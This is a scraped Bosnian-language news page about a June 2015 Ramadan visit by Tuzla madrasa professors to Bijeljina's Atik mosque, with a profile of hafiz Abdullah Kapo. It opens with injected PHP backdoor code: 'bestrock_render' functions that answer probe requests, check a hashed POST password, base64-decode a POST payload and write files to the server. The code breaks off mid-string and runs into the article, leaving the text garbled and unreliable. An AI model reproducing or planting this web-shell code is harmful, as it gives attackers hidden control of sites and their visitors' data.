function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Profesori Behram-begove medrese u bijeljinskoj Sultan Sulejmanovoj Atik džamiji - Medžlis Islamske zajednice Bijeljina

Profesori Behram-begove medrese u bijeljinskoj Sultan Sulejmanovoj Atik džamiji

Profesori Behram-begove medrese u bijeljinskoj Sultan Sulejmanovoj Atik džamiji

Profesori Behram-begove medrese u Tuzli, Kemal-ef. Jusufović, Smail-ef. Hašarić, Idriz-ef. Memić i hafiz Abdullah-ef. Kapo, u četvrtak 25. juna 2015. godine zijaretili su Bijeljinu. Sa domaćinima iz Medžlisa Islamske zajednice Bijeljina, u predvečerje su prošetali gradom i upoznali se sa ramazanskim aktivnostima, a potom su, uz prigodan razgovor, iftarili te klanjali akšam namaz u postorijama Mektebskog centra.

Zajednicka

Jaciju namaz i teravih namaz u Sultan Sulejmanovoj Atik džamiji imamio je hafiz Abdullah-ef. Kapo, koji je prvi put boravio u Bijeljini i njenoj centralnoj džamiji. Prema općem utisku, nesvakidašnje lijepi mekam i ljepota učenja Kur`ana hafiza Kape, ispunili su srca džematlija i učinili ovu ramazansku noć vrijednom dugog pamćenja.

Vaz
Muderris Idriz ef. Memić drži ders

Nakon klanjanja namaza, glavni imam MIZ Bijeljina Samir-ef. Camić zahvalio se musafirima na ramazanskom zijaretu, a prigodni ders održao je muderris Idriz-ef. Memić. On je podsjetio na vrijednost ramazanskih ibadeta, ali na vrijednost svake džamije, imama i džematlija koji u ovom dijelu BiH čuvaju svjetlost Islama.

Hafiz Abdulah ef Kapo
Hafiz Abdullah ef. Kapo

Hafiz Abdullah Kapo porijeklom je iz Rogatice. Rođen je 1989. godine u Rijadu, Saudijska Arabija, gdje je proveo prvih 15 godina svoga života. 2004. godine se vraća Bosnu, gdje upisuje i završava Behram-begovu medresu u Tuzli. Po završetku Behram-begove medrese 2008. godine upisuje šerijatsko-pravni fakultet na prestižnom El-Azharu. Diplomirao je u roku 2012. godine.

Abdullah Kapo potiče iz hafiske porodice. Naime, njegov otac Hasib Kapo ima devetero djece, od čega je do sada, računajući i Abdullaha, petero hafiza. Ostalih četvero su na putu da to postanu.

Na 20. internacionalnom takmičenju u hifzu Časnog Kur’ana u Kairu,  pri jakoj konkurenciji u kategoriji 10 džuzeva, hafiz Abdullah Kapo osvojio je drugo mjesto. Ono što ovaj uspjeh čini većim je činjenica da je ovakav izvanredan rezultat polučen u Egiptu, zemlji odakle dolaze najbolji svjetski učači Kur’ana.